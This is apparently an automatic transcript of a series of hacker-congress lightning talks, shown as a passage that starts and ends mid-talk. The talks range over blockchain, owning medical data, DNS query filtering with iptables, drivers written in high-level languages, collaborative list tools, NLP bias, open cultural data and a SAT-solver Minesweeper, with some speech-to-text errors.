avant-garde artwork in order to get rid of representation, action as in activism aimed at the change in society, and anti-art in order to create novelty which funnily as a paradox of success gets canonized quite fast afterwards. And he defines six characteristics of this process-based analysis. A femoris in this regard would be that a lot of avant-garde artworks are just there for a very short time. You don't have really an object that you could buy and sell which is sort of hacking the art market. We also see that a lot of the hacking gestures are very short lived in nature, but that doesn't make their achievement less. Communatorical as in avant-garde process can be interpreted mostly to freely open source software and git repositories. I'm sorry, we have to take the break. Do you have a contact slide or something, a last slide you would like to show? Yeah, as a finishing sentence, I'd like to say that one parallel is that not only avant-garde nor hacktivism or hacker culture really destructed the institutions that they wanted to reform or hack or revolutionized, but the interventions that they created changed those institutions forever. All right, thank you. Blockchain, Ethereum, cringe, but cool. Yes, there's the clicker. Right. So I subtitled my talk often, but not only a vehicle for fraud since I don't think there's any really getting away from the fact that is the first thing you'll see if you Google for it. But it's worth having a Google. There are some really funny ones. So I would say that when people talk about blockchain, and I do also cringe when I say that word, people are generally talking about a system that does three things. A system where everything is signed, so potentially you can know where everything's come from, it can have a known origin. They have some sort of common logic. Usually referred to as smart contracts, although that's a bad name really, they should be dumb scripts, but at least you have a way of saying A and B happens and they always mean C. You also have a fair and reliable ordering events. So you can say that, for example, a house moves from A to B before B tried to sell it to C, and that's very important. That last bit, the ordering, is the only bit that actually uses a blockchain. And if your threat model is different, you can just use the pen on the cryptographic log. There was a talk on that yesterday. So looking at this a little bit more detail, the signing bit tends to be done with what we would call wallets. Some of them are done with hardware, most of them are mobile phones. The common interpretation is done using some sort of deterministic program. The important thing is it's deterministic. It always has to give the same results, otherwise being a network data structure, the whole thing breaks down. And then the last bit is some sort of robust consensus mechanism. Actually the one that people talk about is Nakamoto consensus, where you run a lot of computers wasting electricity, but that's far from the only way of doing it. So in summary, the real general purpose of having some sort of blockchain is you have a very slow, but honest and transparent computer that nobody owns and everyone can accept the result as being fair. Notice that's not all that you need, so generally blockchain projects tend to have what in the Ethereum world, which as you can see is my preferred platform, we call the whole eternity. So some sort of messaging, some sort of distributed storage that relies on nodes across the internet rather than just one central server. And then the blockchain itself is just for consensus. It's essentially a very slow, reliable computer, but you don't want to use a computer that takes 15 seconds to respond very much in your system if you can avoid it. But you very often have to. The whole eternity phrase is very much an Ethereum thing. If you talk to Bitcoin maximalists, they would say the only purpose of this is currency. I disagree, but you have to admit their system is very successful. And systems like this are great for finance. There's a lot of interesting products around borrowing, lending, mostly cryptocurrencies, but hopefully real things as well. There are a lot of interesting projects around registering property assets, et cetera. And decentralized naming systems, trust games around finding the truth of various statements, and Ponzi schemes, which is sort of in their visible side effect. It's a vehicle for social coordination. So here are some interesting projects. Uniswap is for trading things. Newport is a great system for proving things about your identity. So you can assemble identity of different statements, different people made about you. There's a kickback, which is a great event organizing software that we have that's used very often for Ethereum events, and I would recommend it. And Materium, who are doing very ambitious stuff on coding, legal contracts, and ownership onto the blockchain, which is very useful for transnational trade where a lot of parties simply don't trust each other. There's also quite a lot of frauds, and although I'd like to say that some people might recognize the BitConnect guy, I think he's been convicted, so hopefully I'll get away with the fact that that isn't Creative Commons. It's worth a Google. I'd say don't let it define your notion of the space, but it's really worth a Google, and the BitConnect guy is hilarious, and some of the SEC stuff is really thought provoking. So in summary, the next time you try to kill Facebook, do remember us. Most of the fraud didn't involve any developers. It's a very separate community, and there's a great conference in Vienna. I'd like to emphasize the unicorns. Thank you. All right. And then next up is owning our own medical data. There you go. Okay. I'm Reza. You can find me on GitHub as Fishman. I saw some interesting talks here about the electronic health record in Germany. So I spent three years in the healthcare system in the government in Germany. I most recently built an earthquake detection system for a big mine in the world, and basically the summary of the talk is if we want to own our data, the only way we can do it is if we build the infrastructure ourselves. So we do have a need for medical data stored somewhere. We can improve care. We can improve preventive care. We can improve the speed of medical improvements. We can replace radiologists to some extent, and right now the X's model is you go to the doctor, you fill out the form, at least in Germany, and then you give wildcard access to everything, and there's no real way to revoke it, especially since you don't really remember who you gave it to. So some of the good ideas of the EPA is that you can give fine-grained X's except they already rolled back on that, so that's probably not going to happen. So the bad parts of it. All of your data is stored in a central location. All of the decryption keys, because it's symmetric, is stored in another central location, and if you have a breach, everyone's data is gone, and there's nothing really you can do about it. So what can we do about it is we store our own data. We build a federated API that gives third-party EHRs access to our data, and then, of course, the encryption keys are not stored on the mobile device or whatever. This is just one of the ideas, so I welcome people to actually give maybe better ideas on how we could do it, and it would allow us to actually share the data we want with the people we want. So a lot of the thread stuff that they say about the EPA, of course, we know is not true. We know that the moment the data goes on the end device, you can store it unless you control the entire ecosystem, which is unrealistic, because all the health record management systems by the doctors, most of them are running on Windows, so the moment it goes on there, the guarantee of expiry is kind of not there, so I would keep it out of the threat moment. But at least if we leak data, it leaks from some devices, not all the medical data. So basically it's more of a call to action, so we would have to build a POC, we would have to think about the cryptographic solution to this, and then the real places, and that's the thing, we probably cannot expect the government to use this, but we can expect third parties if our APIs are better than what the government does, which is actually really easy, then there is a chance that people would actually use that instead, or at least give us the choice of also using that. So I set up a GitHub account which doesn't have anything here because I was angeling and like sleeping a little. So I might fill this in the next couple of weeks, but yeah, feel free to help out. All right, thank you. I think the previously missing speaker just showed up. There he is. All right. Then we will take this talk over here. All right. Sorry about that. Sorry, that's perfect because you're invited to disagree with these statements. So a little audience participation. So let's look at the top three statements. Values is not price. Values is not violence. Values is not greed. So without defining values. I invite you to put your hands, palms face up on somewhere where you can remember them. So like your lap. So you keep them like that. And this side over here, if you would put your hands like this on your legs, like rest them on your lap, because you're going to turn them around maybe. Let's take values is not price. That could say values are not for sale. The question I ask you is if you think that is a value, turn over your right hand. On this side, you can put your hands just like this. And if you think that is not a value, turn over your left hand. And right here, the same thing. You can put your hands just on your lap. And if you're not sure, don't do anything. And if you think it's both, raise both your hands. And now everyone up, you're with your hands. What do you got? Okay. We've got like confusion. And we've got two hands. There shouldn't be any two hands here. You're only invited to if, okay. So here's the problem. Right? Everyone wants to say their own opinion. And they're like, huh? I didn't agree to this values. I didn't think that's that. The point is that some people will think that's a value. Some people will think that's not a value. And the real question isn't like can I represent my own values? It's about can we bring people together to talk about them? So that's the question. So proof of human collaboration. Whenever humans have a moment together, they have an opportunity to give what's called a compliment, which comes from the Latin with, let's see, what was it? I had it there somewhere. But it essentially means that you give someone a value that you yourself hold dear. You wouldn't tell someone's kind if you hadn't heard yourself that you had been kind. And so that's the basis for this general discussion. So we tried representing our values and kind of got nowhere, which I think, which I also have trouble with this. I'm just discovering values for myself. The main difference is that we're talking about, that we're coming from a culture where it's really easy to have one value, price, it's really easy to know what is more valuable in terms of price. It's really easy to know if someone is a fascist, it's really easy to know what their main values are. Small lists of values held dearly without the ability to consider them in the context of others. So that algorithm there is essentially one way that you can see how good otherness of value has. There's a lot of depth to this subject. When I talk about work quanta and healing quanta, everything that this project imagines as successful comes in the context of healing. If we design our work to make up for what it takes from the human and from the environment, then we're on the right track. And so by federating over values, a federation in this system is any objects with shared values. If that's human, if that's an institution, if you have two values in common, you're federated. This is what we haven't had a word for this yet, but this is a way of describing human values in a context. Those are consensus rings, and they've shared compliments over a group of values. And those red lines are the values that they have in common. This is essentially because we live in an owned power situation rather than a shared power situation, it helps to keep people in their own value structures rather than in a structure of discourse and development and exchange of what could be the next money. Thank you. All right. So next up is DNS query filtering, and with that we are back on track. The times are as in the schedule again. There you go. Hello. I'm here, Peter, and I'm going to talk about DNS query filtering or how to increase your performance and accidental block users. So the problem we had was that we have an authoritative name server, which is actually two name servers. One is a recursive name server that's not our solution, and there is a solution that's ours and it's written by us, but it has to be complemented with a real and feature-complete recursive DNS server. But because we are using a recursive server, that means we serve everything, and because we serve everything, that's a great UDP amplification vector. And the problem is that we had no time to fix it nicely as we were notified by the provider, our cloud provider, that we either fix this or we are going to be blocked, and we don't like being blocked. So possible solutions, fixing it nicely. This takes long, both on the side where we are fixing our custom solution because it takes development time, a lot of it, or we could use different recursive DNS server that allows us to filter which zones we serve, for example, ours and nothing else. Or we could use IP tables rate limiting, which means we serve less junk, but we still serve it, and we serve less of our valid users. Or we could create content filtering, and that takes some development, and it would be nice, but we don't have time, so nope, IP tables. So we are going to use string matching to be specific hex string matching, but this sounds very, very expensive in the kernel space, so we must perf test it. We did hex string filtering like this. If you want to filter events that CCCDE on UDP port 53, then you can do it like this, and this blocks it, or on TCP almost the same. But this is block listing, not white listing. We tried out hex string, and the overhead is very low. Our original setup could serve 60,000 queries per second from our zone, from one node, obviously, and less than 5,000 queries per second recursive queries. So with hex string, we could drop 240,000 queries per second of recursive queries, which is very nice, and it took only 1% CPU time, which is a great and low overhead solution. And we could still serve near the original 60,000 queries per second from our zone. But the problem is that we wrongly filter all TCP traffic, which is less than 0.1% of our traffic, and wrongly drop all 0x20 queries, which is around 2% bit less. TCP filtering is not that easy if you think about it, because the streams can be fragmented and you can string match packet by packet, and it's quite obvious. Although every guide tells you to do it like you do on UDP, but that only works because they block list, not wide list, so it doesn't work for us. And on TCP, we don't have a UDP amplification vector, so why do it anyway? OX20 is a security feature, so if you encode random bits as lowercase, uppercase, then you can be kind of sure that you got a valid answer. Evans.ccc becomes lowercase e, uppercase ve, lowercase n, uppercase t, lowercase s, and so on. We like memes, but not in our DNS queries. However, this is a quite easy problem, because you can solve it with case-insensitive matching, and it's not a problem anymore. In conclusion, it was fun to try it out, and I blocked 2, 2.3% of our users, which was less fun. Think of ways that we must test more thoroughly if you introduce stricter IP tables rules. You can do that by inserting it before the existing one, do some logging, whatever you want. Thank you for your attention, and major props to Max, my colleague who recommended Hexfilter, and thanks to Vista from Noc, who helped me prepare. Right, thank you, and next up is writing drivers in high-level languages. Hi, I'm Paul, and I'm going to talk about writing drivers in high-level languages again. This is a talk that I've given quite a few times now, and a lot of people have contributed to that. I've also brought a lot of slides, so we'll just skip over a lot of things here. Good news is there's a long version of that talk available on media.cccde if you just search for something with drivers in high-level languages. Okay, of course, drivers, operating systems, and so on, usually written in C, because C is such an awesome language. It's nice, low-level, can poke with pointers on memory and do weird stuff, everyone can read and write C, and if you try really, really hard, then you can even write safe and secure code and see at least some people think they can. I actually don't think they can, but well. So if you look at security bugs in this is CVEs in the Linux kernel over the years, there are a lot of security issues, but of course, not all of them can be attributed to C as a shitty language, but some of them can. There have been studies, for example, in 2017, 61% of the code execution type vulnerabilities in the Linux kernel would have been prevented if it was a memory-safe language that was in use for the kernel, like it would be use after free and missing bounce checks and so on. And we took this data from this study, it was linked down below, and looked at where these bugs actually occurred, and out of the 40 bugs that could have been prevented with a better language, 39 of them were in drivers, and then doing a group buy by vendor, and who is the vendor with the most bugs? Well, 13 run Qualcomm drivers, it was really, really surprising, I thought they had really high quality drivers, but yeah. So question is, can you write drivers in a better language? Yeah, it's a little bit complicated to get a Haskell driver upstreamed in Linux, and also to even get something other than C running inside the kernel, but the good news is that for many devices you don't actually need a kernel driver, you can write user space drivers in any languages. Question is then, of course, are all languages an equally good choice? Are some languages better suited for writing drivers? What are the trade-offs? What about having a JIT compiler or a garbage collector on a driver? Is that even a good idea? So we looked at network drivers in particular, because we happen to know a lot about network drivers, and also user space network drivers like DPDK or Snap and so on are also really common in the high-speed or high-performance world. So what I did two years ago is I wrote a user space network driver in C that was a talk here two years ago, and this is kind of simple driver, easy to understand, because it just does only the very basic things, it's only a thousand lines of code. And next idea was then to write that in a better language, of course, wanted to write it in all the languages, but turns out that's a lot of work and I don't speak all the languages. Good thing is I work at a university, so I can just grab a bunch of students and tell them to write drivers in their favorite languages. Then we had in the end nine driver implementations in these languages, C, Rust, Go, C-sharp, Haskell, O'Camill, Python, our table is not up to date, there's also Java driver nowadays as well. And then we compared them by various criteria like which safety properties are being offered by the language, under which scenarios, under which constraints, and just going to skip over these results because not much time here. Then implementation size, you might think C is very nice because it's just some Terse code full of pointer magic, but other languages can be short as well. Sure, C is still the shortest counted by lines of code, but other languages can be even shorter when measuring the size as in how many bytes are in the source code of the driver because some languages are just like lots of short lines like Haskell or Rust. Yeah, next question, is it fast? Is it a good idea? Well, turns out C is still the fasted language for this kind of job, but Rust comes pretty close and also surprisingly fast for these low level driver stuff, this is a simple benchmark where we just accept packets on a dual port 10G link, minimum size packets, forward and back on the other link, like a bi-directional forwarder, the simplest case you can imagine for a network driver and surprisingly fast are go, C sharp, and well, for us it's not surprising that it's fast. Then performance is always two things, next one is latency, but this graph is too complicated to explain. Basically, garbage collector means high tail latency, no garbage collector is as fast. The lines for C and Rust are directly on top of each other, there's no latency penalty for using Rust over C, but there are latency penalties for languages with jit compilers and garbage collectors, however, the go and Java garbage collectors are surprisingly well done, at least the goes by default well done, Java when you use the new Shenandoah garbage collector then it's relatively fast, we can get tail latency below 50 microseconds, which is acceptable for most applications. Final slide, there is a GitHub repository with links to these slides, to recordings of all versions of the talks and to all the codes. Thank you. Thank you. Next up is Tour de Rebel. Yeah. Hello people, everybody welcome, thank you for being here. Now you see a logo over there and I suggest that we're going to start to play a game, because the logo has been transformed the past few days, my cousin has helped me to transform the logo because it's Tour de Rebel is related to extinction rebellion, but it's not the extinction rebellion tour on bike. So let's play a game, because I expected to be, I didn't know which room I would be, so I didn't know that I would be speaking in such a huge audience over here, I thought I would be something like the nutshell and I'm here with my PowerPoint presentation, anti-technology, but there are a lot of those flyers hanging around and there's a QR code in which you can find much more information and hopefully some are enthusiastic about the project after my short presentation of five minutes and would like to join an introduction presentation online in the next few weeks. But what is Tour de Rebel? That's what I'm going to explain now, but if anybody can see this, maybe zoom in with your good cameras on the QR code, I don't know whether that's possible. So Tour de Rebel, the world's largest moving climate camp on bike around the world. So everybody now sees a pink elephant in front of your eyes, like okay moving climate camp, so now I'm trying to wipe away those clouds in front of the Tour de Rebel and try to explain the vision of the people I met the past two months which I was encountering during my cycling tour around, well I was also cycling around the globe, but I mean I was not coming further than the Netherlands and Germany, but I started at least. So Tour de Rebel, what I'm presenting now to you is not my idea, but a collection of the ideas of many people I met the past two months. It started with an idea, okay I want to slow travel, I want to make sustainable traveling just much more nicer because it's such an experience to cycle the stage between Hamburg and Bremen for example, which have been one hour of train or one hour by car for me the past few years and now I did this within one week with a couple of other people and it was just such an amazing adventure to get in touch with nature again and to slow travel through the world. However, slow traveling is only one aim of the Tour de Rebel, an experience sending adventure because it's far more than just cycling around the globe because everybody apparently is currently doing that, if you look on Instagram you'll find Pet of the World and all the other people, it's nothing really special and connecting and I want to do something with the other people I'm cycling around to do something with just connecting movements who are trying to change the system with each other. So the second aim of the Tour de Rebel is try to form a network of a platform for people to meet each other. Imagine a few hundred people cycling together from Bremen to let's say Berlin and on the way from Bremen to Berlin they meet a lot of people from different organizations, they network with each other, they exchange experiences and they exchange skills and knowledge and that is something which is lacking from my point of view within organizations but also between organizations so the Tour de Rebel tries to be a platform for networking and I already mentioned the last aim of the three aims which is skill sharing and information spreading so if you imagine a climate camp cycling around the globe and you arrive, at least for example I arrive with five people together in a small village of 200 people, nobody noticed but if you arrive with 200 people in a 200 village, 200 person village, it will be noticed, it will be the event of the year so a climate camp slash justice, social justice camp is an attention point if you cycle by bicycle around the globe, everybody wants to be there at least hopefully everybody who prompt for future, I don't need those people but at least the rest of the population is interested. So still what is it now, how can I join or be part of it, scan the QR code because it's not only about cycling, I started cycling the past two months and many people joined, we were about 50 people cycling in total from point to point and in the end many people also took background organization stuff like filming and stuff so what is needed now is an organizational team and building a platform and if you want to join, clap in. Thank you very much and play the game and search for the QR codes of the Tour de Rebel, thank you. You can put it in front of the stage, you can put the QR code in front of the stage so everybody who wants can scan it. Yeah, just somewhere there, so next talk is going to be a listling an open source web app. So hi everyone, my name is Sven and today I want to talk shortly to you about the need for low threshold collaboration in self-organized groups. So let's start by imagining or picturing ourselves in a self-organized group like a group that's based on voluntary work, like an activist group or a civic group, you know. And in those groups we have people with different backgrounds and that also means people with different IT skills and often those groups features an open participation model so you can easily join but that also means you can easily leave and often you have fluctuating members. So for now let's imagine we have our little group with Alice and Bob long standing members and then there's this newcomer eager to join. So what are the challenges they face for online collaboration? So if the group uses multiple online tools for collaboration you will have this scenario where they tell the newcomer, okay look we have a shared task list and we use this app, please install it and then we have a poll, please use this website and register and also we have a wiki and we will make you an account. And the newcomer is like, oh okay I installed five apps and what was my password for the first one? Okay, this can get quite overwhelming. So some groups then say okay let's use just one software, a groupware and this is yeah cool but it also has a steeper learning curve. So that's not a problem when we have an enterprise environment where you have one week of onboarding time but in a voluntary setting this is really off putting for newcomers and also many groups don't have the resources to set up a groupware. So what I see often when I'm active in activist groups is that we use adapat or spreadsheet say collaborative documents and they are fine if you want to do collaborative text work but if you use them for other use cases and people often do like let's say a to-do list then yeah in a text document it's already a pain to move items around and if you have a spreadsheet it's like okay I have all the cells and buttons and then I have formulas and formatting options, okay no. So all in all I would say this creates something like a collaboration barrier and what I see very often in those groups is that only a small minority of people use those online collaboration tools and then we have something like okay then let's just do everything over email or let's do everything in a telegram channel and that can be quite messy. So what can we do about that? One night I had this idea what if we would have a collaborative document but with a bit more structure better fitting to typical use cases of self-organized groups and what about lists. So it turns out that groups often need lists. To do lists this is obvious but the Wiki could also be a list of small list of notes and the poll it's also just a list of options where you can vote and if you have a meeting again that is also a list and so on and so on and so on. So in 2018 I sat down and said okay I'm going to make Listling and Listling is a service to make and edit collaborative lists. It's online you can use it and it has no registration whatsoever you just create a list and share the link it's free for use and it has a focus on a simple UI. Of course it's open source and you can hack it and contribute if you want. So now this would be the time for a demo but actually what is a presentation? A presentation is just a list of slides so I thought well then I do it at Listling and that's what you saw now. Nevertheless I have some screenshots for you. You can not only do presentations you can also do like in the middle you see lists have different features and in the middle you see a task list where you can assign people or check items or whatever and on the right side you see an example poll so you can add options and vote for them. Actually I was quite fast. So that's it. You can try it online on Listling.org if you have any ideas or feature requests I would love to hear them and you can contribute on GitHub. And if you want to get in touch if you have any questions we have a GitHub community you can find me on Twitter and also you can talk to me right there after all the other lightning talks are over. So in the name of Alice Bobbin the newcomer thank you. Thank you. Next up is Unary yet another tally sheet for your Hacker space. Good morning. I'm Johannes and I'm going to talk about something that's at the heart of every hacker or makeup space today it's consuming beverages and keep working based on the beverages you consume and everybody needs a tally sheet for that or to keep track record of who's consuming what. So the use case here is very simple version of this just a tally sheet but in an electronic system so it's just a system that helps the users to keep track of their balance. And the security model here is trust so if you have physical access to the fridge you can compromise the system. So there's lots of solutions obviously because every hacker space needs something like this and all of these solutions typically are sexy hacking projects because it was so much fun to develop some custom hardware to make it run on some vintage stuff you know have a barcode scanner things like that. It's very sexy for hacking but often it's not so sexy for maintaining and also the usability is not the greatest you can have typically. So that's why I developed yet another of these systems and my system is boring. So the idea is to have very boring solution, very simple solution that's still nice and usability. And for this I just use off the shelf components, I just use modern web frameworks and I also use just an old Android tablet. One of these old tablets that you're not fun to use anymore you can just use it for this system because each tablet comes with a high resolution touch screen and that's really great for usability. So here's how it looks like. You can see you know we have a screen where you can pick your account based on the color you picked or based on some icon. Easily identifiable, you can filter for users and then after you picked your account you can pick the beverages you would like to consume, you get visual feedback when you buy it and you have features like adding deposits, cash deposits or also looking at your recent transactions and reverting wrong transactions, things like that. Many more features but the idea here is that it's not about features about how simple the system really is. So looking at the software side of things you can see that on the server we just deliver one single HTML page which is web application and then we continue handling requests and managing the database and for this we lead less than 300 lines of code actually on the server side in Python. On the client side we use the view.js framework which is very nice because we can embed the variables and logic into the HTML code and then we have the reactive nature of this framework which makes it easy to just keep the state in the JavaScript object. So this JavaScript object is only 150 lines of code and the rest is just how UI elements are supposed to look like and behave. It's a very simple system and it's also very simple because we use web circuits for communication. Web sockets allow us to send simple messages and the socket IO library also persists the connection between the server and the client so it's also very low latency and very robust. And using this we also take note of this reactive component of view.js so what we do is when for example you buy a product the client doesn't update its state. The client just gets a visual feedback for successful buying the product. The balance is updated by the server and the server pushes the state to the client constantly so that's also saving us a lot of logic on both sides. For the deployment still boring we just have it in fry work running for this year now just an old Sony tablet and the whole system is actually contained in the tablet. There's no other server or any other system or hardware needed to consume beverages in the fry lab. And this is made possible because the termics environment many people think termics is just a terminal application but actually it's providing a full-blown distro and you can install all these packages and you can actually run these server components with a start-up script on the tablet itself. So it doesn't even need internet connection or anything to work. The user just sees the browser and the browser is put into full screen mode so the user doesn't actually see the browser, only sees our interface as I showed you in the screenshots. But this is obviously not the only way you can do it, right? So if you want to you can still put the server component on some other machine and have multiple clients and actually web sockets and shays and libraries that you can find in every language or environment. So in fry work this system already runs for quite almost a year with no complaints. It's only a thousand lines of code so there's not much that can go wrong but it still works for me state. So I'm very happy to put this to the next level and I'm very happy to get future requests, people who would like to employ this too or also change it and make it more sustainable. And there's also some alternatives you might want to look at. Thank you. Thank you. Next up is natural language processing is harder than you think. All right, hi, my name is Ingle and I'm going to talk about why NLP is despite things like BERT and GPT2 not solved yet and it's really harder than most people think. So have you ever been disappointed by an NLP system like your Alexa or your car or some other thing you use? I am daily and I work on these type of things which is a sad state. But why is that? It is because language is hard and language is ambiguous and language is complex and language is fluid. It changes, people use more than one language usually and generally speaking we don't really know how language works. So let's exemplify that. This is a fairly easy sentence. They saw a vet with a telescope. Now first of all, they could be singular, could be plural, we don't really know. A vet could be a veterinarian, a doctor or it could be a veteran, a soldier for example or a pirate, I don't know. So what could we do here? Well it could be that they saw a vet with a telescope. The vet owns a telescope. Could also be that they saw that vet with their own telescope. And finally, could also be that they saw a vet, they went to a doctor's office and apparently that doctor had a telescope. So okay, try to parse that. It's pretty tricky. For humans it's fairly easy if we have enough context. So let's look at some more challenges that we have to face in doing an LP. Languages matter. Most people speak more than one language and not many people speak only their standard variety. People mix and match languages on every day basis and we have to consider that. Context matters. If we see that vet, we know whether it's a soldier, whether it's a doctor or whether it's something completely different. Data matters both in terms of privacy and in terms of the data that we use and the corporate that we use for an LP. And we need to be very aware of the fact that the data that we use to train our systems has an impact on what we are able to do and also on the results that we get. And finally, hidden biases matter. And that could be a translation system that judges gender based on job titles. That could be a sentiment analysis system that judges sentiment based on names and has maybe a racial stereotype in built. And these are all things that we see in these systems that we have available currently. So if we have all of these issues, what could be potential challenges? Well first of all, it could be just bad user experience. You talk to your Alexa, Alexa doesn't understand you because you are not an old white man on which the data has been trained, right? That could be a case. But it could also be that these systems generate faults and potentially dangerous results and conclusions. And that could be an actual problem. Maybe just for business cases, but essentially also from an ethical standpoint, this could be a really big issue. Also we have a marginalization of languages and speakers. Because for some reason we still equate natural language with English. And most models that we have are English, somewhere German. And depending on how many speakers a language has, but rather on how much money the speakers of that language have, the models are better or worse. That's a sad state in which we are in. And lastly, many of these models are reproducing and reinforcing social norms and stereotypes. And we have to be extremely aware that this is happening and that this could be or is an actual issue that we are facing on an everyday basis. So what can we do? Well, we should at least consider these things. And we should try to build language models that are aware of these issues. And we should try to think back to include context into our models. And we should be aware of the fact that there is not just English, but there are many languages. And that most people speak more than one language. And we have to consider that. And that it's maybe unfair for someone to force them to just use one language instead of all the languages that they have available. And that's basically that a call to action. Solutions are very hard, but language is very hard. And we have to embrace that complexity if we really want to do natural language processing in a way that is not just future proof, but that is also fair in terms of stereotypes and is fair in terms of treating people as who they are and as in terms of the languages that they speak and in terms of the languages that they want to speak. Thank you. Thank you. Next up is rebuild. Hack a better programming language. So, hi. Yeah, we heard a lot of languages now. So if we want to build drivers or process natural languages, I think programming languages are serving us very well. And they more and more become a tool. So we not only instruct computers what they have to do, but we also express our ideas and understandings of the world in programming languages. So I think even though languages are good, we can do much better. So that's the rebuild language project. We want to hack a better programming language. And so what's our goal? It has to be as least, as fast as C. We want to have fun. So we skip all the legacy. And one of the major goals is we want to make it more accessible. So we want to include everybody. Want to make them able to hack. And what are the concepts now? So I cannot express or convince you in five minutes what the programming language or what the project is about. We have a lot of ideas. We have very high motivation. And the only good thing is we have persistence. So we keep on. So what I don't want to do is I want to set a hackable programming language in contrast to commercial programming languages and also academic languages. So they have a certain valid concept. But I think getting a hacker perspective into that language realm is really important. So we have to use our weaknesses as a strength and keep it stupid simple. That's the main hacker culture thing. And we also keep it hackable. So hackable really means, for example, we want to have translatable error messages or diagnostics that are not only processed by humans but also by tools. So it is very easy to do but almost no programming language we use today does that. Now to one of the more involved concepts I am experimenting with today. So the main concept now is to use compile time code execution as a main driver for the language. So if we have that, we can basically replace everything else. For example, we can skip all the keywords. So we can make the programming language more accessible because everybody can place their own keywords however they want it. In the language they need, the language they know. So it's more accessible for people who don't speak English or kids who cannot speak English yet. So they want to learn programming and learn the concepts. So the other thing is when we have no keywords, how do we do anything in the language then? So the main idea right now is to have an interactive compiler API. So what you do basically is when the program compiles, you talk to your compiler, please do, declare a variable, create a function, make a class, whatever is needed to communicate to the compiler. So instead of using a keyword for that, you just call an API at compile time and the compiler does what you request them to do. So these are main ideas I'm experimenting right now. But there are a lot more involved. So there are more ideas I want to explore. That's basically the call to action here. Not me have hackers create a more accessible programming range. Thank you for your attention. You can find experiments at GitHub. And I also created an RFC repository request for comments. I try to write down ideas and then explore them in the real compiler. And if you don't want to contribute in code or ideas, then you can at least follow our GitHub or Twitter account, we building. And thank you for your attention. Thank you. All right. Next up is Open Cultural Data is out there. Hello, I'm here today to share my enthusiasm about open cultural data with you and to share as many as possible with this enthusiasm. Many of you are really familiar with the library, museum, archive worldwide, their collections in high quality and systematically in large numbers digitalize and many do that so that license law and also technically these data can be used. Not necessarily just about mails. Just like that, of course, are country cards, available signs, three-dimensional objects from sculptures, coins and so on, handwritten, hundreds of years, thousands of old things with many different content that can be evaluated very differently, also spec-framed, can be evaluated so far, audio, video material in the natural sciences areas, in there, in tents, films, whatever, a huge data cache is built and prepared by these cultural institutions and many of them are still in the past few years have done it so that these data were presented in digital vitrines that you could only look at, but increasingly it is so that these settings can be available to APIs, through which you can dig up the data, research, can also process the data in large quantities, here, for example, the Metropolitan Museum in New York or the Reichsmuseum in Amsterdam, own APIs are ready, through which you can fully experience their collections and can process with your own software. Many other settings, but also set up generic APIs, a little older, a little more more modern, are the URI, PMH, or SRU, which are based on XML and HTTP, for example, the International Image Interoperability Framework, TripleIF, which is based on JSON, JSON-LD, so it is linked data, that means you can also bring it very well with other data sources in connection and network these data together. Moreover, TripleIF offers the opportunity to directly ask the data data dynamically, not always to pull the complete large pictures, but for example, to only pull the own web applications, only cutouts or smaller or variant, from the image servers directly. There are incredibly many sources on the Internet and I have my presentation a little bit like this, that it is also a small link collection, in this whole world of cultural data, for example, a few beginners to deal with TripleIF, among others the Internet Archive, I think that is not public at the moment, but you can find it via their test server, which is also asked by TripleIF. There are also connections, for example, to European or German digital libraries, which then can be done on a more comprehensive level, the data, the metadata collection, can be researched and also done via APIs. What can you do with such data? You can easily or directly on the hand lying, of course, to simply show the data or somehow do it through search bar. But you can also create new tools, tools, tools to create based on art or design to design on these graphics, which are often today community-free or at least as Creative Commons licensed data are prepared to work. As well as artificial intelligence methods, machine learning methods to generate new art techniques, create funny applications, to inform seriously about the past, that you can do that with these data, with these estimates. And a good possibility for that are, for example, the coding of Winchi hackathons, which take place a few years ago, special cultural institutions for these hackathons, are then ready, but permanently and interested people deal with these data, create new applications and art applications, meaningful things, games, whatever you can do with it in the context. Thank you for your attention. I hope the left-handers can be called off at some point, and I can also be directly able to talk to them. Thank you. Thank you. So if you want your slides to be available for the speakers, please upload them in the submission system as a resource. Then everybody can see them, they are public and can be downloaded. So we're going to have our last talk for this session. I'm sorry for the waiting list people. We are back on time and don't really have space for another talk. So I'm sorry. But maybe see you next year. So this is the last talk. Kaboom, a cruel but fair Minesweeper. Hello, everyone. I want to talk about a really cool project that I did recently and really enjoyed. So this is a Minesweeper game. You've probably all played Minesweeper, but just to remind you, so this is a game where there's a number and this is a number of adjacent cells with mines. You have to uncover the cells without mines. If you hit a mine, you die. And of course, as you know, well, you can play this game using logic or you can guess. And sometimes you even are forced to guess because, well, because there's like two different possibilities and you cannot just reason about which one is correct. So this sucks a bit, I would say. So recently I had an idea. So what if the computer cheated? So you might not know this, but the default Windows Minesweeper already cheats. So you know how it's never the first mine. The first square is never a mine. So if you play somewhere and it would be a mine, then the computer moves the mine around and basically invents a new placement for you. So what if there was never any placement in the first place? So there nothing is predefined. And when you play, we just invent a maximally inconvenient placement for you. So basically, if a square can contain a mine, it will contain a mine. So you have to be really careful, use logic, reason, and basically prove that a square doesn't contain a mine before playing. In a sense, you could say that this Minesweeper is a full information game that you play against the computer. It's like chess, for instance. So this is how it looks like. You have to, so on the left, you see the cells. And you can see that some cells are safe. These are the dots. Some are dangerous. Basically, they are guaranteed to contain a mine. That's this our exclamation mark and some are question marks. So there could be a mine. There could be empty. And you have to play a safe cell. If you play the question mark, then magically, a mine will appear there just because it can. And the one exception is that, well, sometimes you are forced to guess because nothing is safe. And then we allow you a guess. And basically, you can influence your future because wherever you will play, whichever question mark you will play, then you will uncover an empty square. So the implementation looks like this. Basically we have to consider only the boundary of the revealed cells. The outside is not important other than also this total number of minesminesminesminesminesmines. And at this boundary, we just compute all the possibilities using a backtracking algorithm and combine them. So you can see on the right-hand side that some of the squares are guaranteed to have a mine and some can, some are guaranteed empty and some are neither. So this was my first implementation. But unfortunately, it was too slow. And yeah, this way you can basically fill up 12 gigabytes of memory. And even though the arrangement is supposed to be pretty simple. So probably we need something better because as you can see, actually, the situation on the board is not so complicated. And if you were a human, you could probably say a lot about the situation. So I decided to use a SAT solver, which is basically a tool for mathematically checking. It's a mathematical formula can be satisfied. So on the right, you can see such a formula. If you have three squares, there could be zero or one, and the sums have too much. And basically, all our board is a set of formulas that say that, well, exactly this end of some rounding fields have to be mines. Or in total, there has to be exactly M mines. And basically, now we can prove things mathematically about the game. And I still need to do some tricks to cache the results. But overall, it's pretty fast. It's pretty playable. It will not hang up on you. And that's basically it. Here you can see the game. It should work on a computer and also on a mobile system. You can go through this link or you can just Google for it. The name is Kaboom. And you can also read a blog post because this is a pretty short talk. But actually, I had a ton of different adventures developing this game, and it was a pretty deep rabbit hole. So thank you very much. Keep playing, and I 